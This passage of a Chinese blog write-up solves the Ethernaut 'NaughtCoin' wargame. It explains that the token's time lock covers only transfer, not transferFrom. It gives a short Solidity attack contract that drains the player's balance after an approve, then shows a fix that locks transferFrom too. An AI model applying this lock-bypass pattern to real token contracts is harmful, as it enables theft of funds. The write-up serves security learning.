class="hljs-title class_">Transfer</span>(<span class="hljs-title function_">address</span>(<span class="hljs-number">0</span>), player, <span class="hljs-variable constant_">INITIAL_SUPPLY</span>);<br>    &#125;<br><br>    <span class="hljs-keyword">function</span> <span class="hljs-title function_">transfer</span>(<span class="hljs-params">address _to, uint256 _value</span>) <span class="hljs-keyword">public</span> <span class="hljs-keyword">override</span> lockTokens returns (bool) &#123;<br>        <span class="hljs-variable language_">super</span>.<span class="hljs-title function_">transfer</span>(_to, _value);<br>    &#125;<br><br>    <span class="hljs-comment">// Prevent the initial owner from transferring tokens until the timelock has passed</span><br>    modifier <span class="hljs-title function_">lockTokens</span>(<span class="hljs-params"></span>) &#123;<br>        <span class="hljs-keyword">if</span> (msg.<span class="hljs-property">sender</span> == player) &#123;<br>            <span class="hljs-built_in">require</span>(block.<span class="hljs-property">timestamp</span> &gt; timeLock);<br>            _;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            _;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>我们需要知道ERC20代币的EIP（以太坊 Improvement Proposal）是如何运作的，以及OpenZeppelin是如何实现它的（该合约使用OpenZeppelin框架库），推荐先阅读一下面的文章：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md">ERC20标准</a></li>
<li><a target="_blank" rel="noopener" href="https://eips.ethereum.org/EIPS/eip-20">以太坊 EIP-20</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/OpenZeppelin/zeppelin-solidity/tree/master/contracts">OpenZeppelin仓库</a></li>
<li><a target="_blank" rel="noopener" href="https://docs.openzeppelin.com/contracts/4.x/api/token/erc20">OpenZeppelin ERC20文件</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol">OpenZeppelin ERC20实现</a></li>
</ul>
<blockquote>
<h4 id="transfer"><a href="#transfer" class="headerlink" title="transfer"></a>transfer</h4><p>Transfers <code>_value</code> amount of tokens to address <code>_to</code>, and MUST fire the <code>Transfer</code> event. The function SHOULD <code>throw</code> if the message caller’s account balance does not have enough tokens to spend.<br>将 <code>_value</code> 数量的令牌转移到 <code>address _to</code>，并且必须触发 <code>Transfer</code> 事件。如果消息调用者的账户余额没有足够的代币可供花费，则函数应该<code>抛出 </code>。</p>
<p><em>Note</em> Transfers of 0 values MUST be treated as normal transfers and fire the <code>Transfer</code> event.<br><em>注意</em>值为 0 的传输必须被视为正常传输，并触发 <code>Transfer</code> 事件。</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">function</span> transfer(address _to, uint256 _value) <span class="hljs-built_in">public</span> <span class="hljs-keyword">returns</span> (<span class="hljs-type">bool</span> success)<br></code></pre></td></tr></table></figure>

<h4 id="transferFrom"><a href="#transferFrom" class="headerlink" title="transferFrom"></a>transferFrom</h4><p>Transfers <code>_value</code> amount of tokens from address <code>_from</code> to address <code>_to</code>, and MUST fire the <code>Transfer</code> event.<br>将 <code>_value</code> 数量的代币从地址 <code>_from</code> 转移到地址 <code>_to</code>，并且必须触发 <code>Transfer</code> 事件。</p>
<p>The <code>transferFrom</code> method is used for a withdraw workflow, allowing contracts to transfer tokens on your behalf. This can be used for example to allow a contract to transfer tokens on your behalf and&#x2F;or to charge fees in sub-currencies. The function SHOULD <code>throw</code> unless the <code>_from</code> account has deliberately authorized the sender of the message via some mechanism.<br><code>transferFrom</code> 方法用于提现工作流程，允许合约代表您转移代币。例如，这可用于允许合约代表您转移代币和&#x2F;或以子货币收取费用。除非 <code>_from</code> 账户通过某种机制故意授权了消息的发送者，否则该函数应该<code>引发 </code>。</p>
<p><em>Note</em> Transfers of 0 values MUST be treated as normal transfers and fire the <code>Transfer</code> event.<br><em>注意</em>值为 0 的传输必须被视为正常传输，并触发 <code>Transfer</code> 事件。</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">function</span> transferFrom(address _from, address _to, uint256 _value) <span class="hljs-built_in">public</span> <span class="hljs-keyword">returns</span> (<span class="hljs-type">bool</span> success)<br></code></pre></td></tr></table></figure>

<h4 id="approve"><a href="#approve" class="headerlink" title="approve"></a>approve</h4><p>Allows <code>_spender</code> to withdraw from your account multiple times, up to the <code>_value</code> amount. If this function is called again it overwrites the current allowance with <code>_value</code>.<br>允许 <code>_spender</code> 多次从您的账户提款，最高可达 <code>_value</code> 金额。如果再次调用此函数，它将用 <code>_value</code> 覆盖当前限额。</p>
<p><strong>NOTE</strong>: To prevent attack vectors like the one <a target="_blank" rel="noopener" href="https://docs.google.com/document/d/1YLPtQxZu1UAvO9cZ1O2RPXBbT0mooh4DYKjA_jp-RLM/">described here</a> and discussed <a target="_blank" rel="noopener" href="https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729">here</a>, clients SHOULD make sure to create user interfaces in such a way that they set the allowance first to <code>0</code> before setting it to another value for the same spender. THOUGH The contract itself shouldn’t enforce it, to allow backwards compatibility with contracts deployed before<br><strong>注意</strong> ：为了防止像<a target="_blank" rel="noopener" href="https://docs.google.com/document/d/1YLPtQxZu1UAvO9cZ1O2RPXBbT0mooh4DYKjA_jp-RLM/">这里描述</a>和<a target="_blank" rel="noopener" href="https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729">讨论</a>的攻击媒介，客户端应该确保在创建用户界面时，先将限额设置为 <code>0</code>，然后再为同一花费者将其设置为另一个值。尽管 Contract 本身不应该强制执行它，以允许向后兼容之前部署的 Contract</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">function</span> approve(address _spender, uint256 _value) <span class="hljs-built_in">public</span> <span class="hljs-keyword">returns</span> (<span class="hljs-type">bool</span> success)<br></code></pre></td></tr></table></figure>
</blockquote>
<p>分析代码，</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs json">constructor(address _player) ERC20(<span class="hljs-string">&quot;NaughtCoin&quot;</span><span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;0x0&quot;</span>) <span class="hljs-punctuation">&#123;</span><br>        player = _player;<br>        INITIAL_SUPPLY = <span class="hljs-number">1000000</span> * (<span class="hljs-number">10</span> ** uint256(decimals()));<br>        <span class="hljs-comment">// _totalSupply = INITIAL_SUPPLY;</span><br>        <span class="hljs-comment">// _balances[player] = INITIAL_SUPPLY;</span><br>        _mint(player<span class="hljs-punctuation">,</span> INITIAL_SUPPLY);<br>        emit Transfer(address(<span class="hljs-number">0</span>)<span class="hljs-punctuation">,</span> player<span class="hljs-punctuation">,</span> INITIAL_SUPPLY);<br>        emit Transfer(...)<br>	<span class="hljs-comment">//emit 是 Solidity 中用来触发（emit）事件的关键字。</span><br>	<span class="hljs-comment">//Transfer 是 ERC20 标准中定义的事件（event Transfer(address indexed from, address indexed to, uint256 value);），表示一次代币的转移。</span><br>	<span class="hljs-comment">//前端 DApp 或区块浏览器（如 Etherscan）会监听这个事件来展示转账记录。</span><br>	<span class="hljs-comment">//address(0)表示 “地址0”，也就是 0x0000000000000000000000000000000000000000。</span><br>	<span class="hljs-comment">//在 ERC20 中，从这个地址发出代币意味着“铸造（mint）”，即新创建了代币。</span><br>	<span class="hljs-comment">//player这是接受者地址，也就是合约部署时传入的地址，拿到全部初始供应。</span><br>	<span class="hljs-comment">//INITIAL_SUPPLY表示此次转移的代币数量，这里是 100 万个（带 18 位小数）。</span><br>    <span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>重写了<code>transfer</code></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs json">function transfer(address _to<span class="hljs-punctuation">,</span> uint256 _value) public override lockTokens returns (bool) <span class="hljs-punctuation">&#123;</span><br>        super.transfer(_to<span class="hljs-punctuation">,</span> _value);<br>    <span class="hljs-punctuation">&#125;</span><br><br>加上了lockTokens修饰<br>modifier lockTokens() <span class="hljs-punctuation">&#123;</span><br>        if (msg.sender == player) <span class="hljs-punctuation">&#123;</span><br>            require(block.timestamp &gt; timeLock);<br>            _;<br>        <span class="hljs-punctuation">&#125;</span> else <span class="hljs-punctuation">&#123;</span><br>            _;<br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br>如果没到<span class="hljs-number">10</span>年后，就不让你取出来你的钱<br></code></pre></td></tr></table></figure>

<p>但是，<a target="_blank" rel="noopener" href="https://docs.openzeppelin.com/contracts/4.x/api/token/erc20">OpenZeppelin ERC20文件</a>中提到了有两个转移的方式，虽然<code>transfer</code>没了，但是还有<code>transferFrom</code>啊</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242231639.png" srcset="/img/loading.gif" lazyload alt="image-20250424223123690"></p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242231854.png" srcset="/img/loading.gif" lazyload alt="image-20250424223157417"></p>
<p>不过，<code>transferFrom</code>在发送这些代币之前，所有者必须<strong>授权（approve）</strong>“发送者”管理该数量的代币。</p>
<p>那我们的思路就是，用新账户搞一个新合约，让原主给我们新合约授权，然后<code>transferFrom</code>转走，就可以了</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">// SPDX-License-Identifier: MIT<br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>interface INaughtCoin &#123;<br>    <span class="hljs-keyword">function</span> approve(address spender, uint256 amount) <span class="hljs-keyword">external</span> <span class="hljs-keyword">returns</span> (<span class="hljs-type">bool</span>);<br>    <span class="hljs-keyword">function</span> transferFrom(address <span class="hljs-keyword">from</span>, address <span class="hljs-keyword">to</span>, uint256 amount) <span class="hljs-keyword">external</span> <span class="hljs-keyword">returns</span> (<span class="hljs-type">bool</span>);<br>    <span class="hljs-keyword">function</span> balanceOf(address account) <span class="hljs-keyword">external</span> <span class="hljs-keyword">view</span> <span class="hljs-keyword">returns</span> (uint256);<br>&#125;<br><br>contract FullNaughtCoinAttack &#123;<br>    INaughtCoin <span class="hljs-built_in">public</span> naughtcoin;<br>    address <span class="hljs-built_in">public</span> player;<br><br>    constructor(address _naughtcoin, address _player) &#123;<br>        naughtcoin = INaughtCoin(_naughtcoin);<br>        player = _player;<br>    &#125;<br><br>    <span class="hljs-keyword">function</span> attack() <span class="hljs-keyword">external</span> &#123;<br>        uint256 balance = naughtcoin.balanceOf(player);<br>        naughtcoin.transferFrom(player, msg.sender, balance);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>让原主授权，Remix贴心地给出了这个接口</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242334524.png" srcset="/img/loading.gif" lazyload alt="image-20250424233440990"></p>
<p>授权后调用我们的攻击合约</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242338351.png" srcset="/img/loading.gif" lazyload alt="image-20250424233854615"></p>
<p>原本账户已无钱，全到了新账户</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242338719.png" srcset="/img/loading.gif" lazyload alt="image-20250424233829701"></p>
<h4 id="修复方式："><a href="#修复方式：" class="headerlink" title="修复方式："></a>修复方式：</h4><h5 id="锁定-transferFrom-同样的逻辑"><a href="#锁定-transferFrom-同样的逻辑" class="headerlink" title="锁定 transferFrom 同样的逻辑"></a>锁定 <code>transferFrom</code> 同样的逻辑</h5><p> <strong>重写 <code>transferFrom()</code></strong> 函数，并应用 <code>lockTokens</code> 修饰符，和 <code>transfer()</code> 一样。</p>
<hr>
<h5 id="修复后的合约代码（关键部分）"><a href="#修复后的合约代码（关键部分）" class="headerlink" title="修复后的合约代码（关键部分）"></a>修复后的合约代码（关键部分）</h5><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs json">function transfer(address _to<span class="hljs-punctuation">,</span> uint256 _value) public override lockTokens returns (bool) <span class="hljs-punctuation">&#123;</span><br>    return super.transfer(_to<span class="hljs-punctuation">,</span> _value);<br><span class="hljs-punctuation">&#125;</span><br><br>function transferFrom(address _from<span class="hljs-punctuation">,</span> address _to<span class="hljs-punctuation">,</span> uint256 _value) public override lockTokensFrom(_from) returns (bool) <span class="hljs-punctuation">&#123;</span><br>    return super.transferFrom(_from<span class="hljs-punctuation">,</span> _to<span class="hljs-punctuation">,</span> _value);<br><span class="hljs-punctuation">&#125;</span><br><br>modifier lockTokens() <span class="hljs-punctuation">&#123;</span><br>    if (msg.sender == player) <span class="hljs-punctuation">&#123;</span><br>        require(block.timestamp &gt; timeLock<span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;Tokens are locked&quot;</span>);<br>    <span class="hljs-punctuation">&#125;</span><br>    _;<br><span class="hljs-punctuation">&#125;</span><br><br>modifier lockTokensFrom(address _from) <span class="hljs-punctuation">&#123;</span><br>    if (_from == player) <span class="hljs-punctuation">&#123;</span><br>        require(block.timestamp &gt; timeLock<span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;Tokens are locked&quot;</span>);<br>    <span class="hljs-punctuation">&#125;</span><br>    _;<br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/blockchain-solidity/" class="print-no-link">#blockchain solidity</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Ethernaut-刷题小记（六）</div>
      <div>https://eznp.github.io/2025/05/08/Ethernaut-刷题小记（六）/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Zer0</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月8日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/14/Ethernaut-%E5%88%B7%E9%A2%98%E5%B0%8F%E8%AE%B0%EF%BC%88%E4%BA%94%EF%BC%89/" title="Ethernaut-刷题小记（五）">
                        <span class="hidden-mobile">Ethernaut-刷题小记（五）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
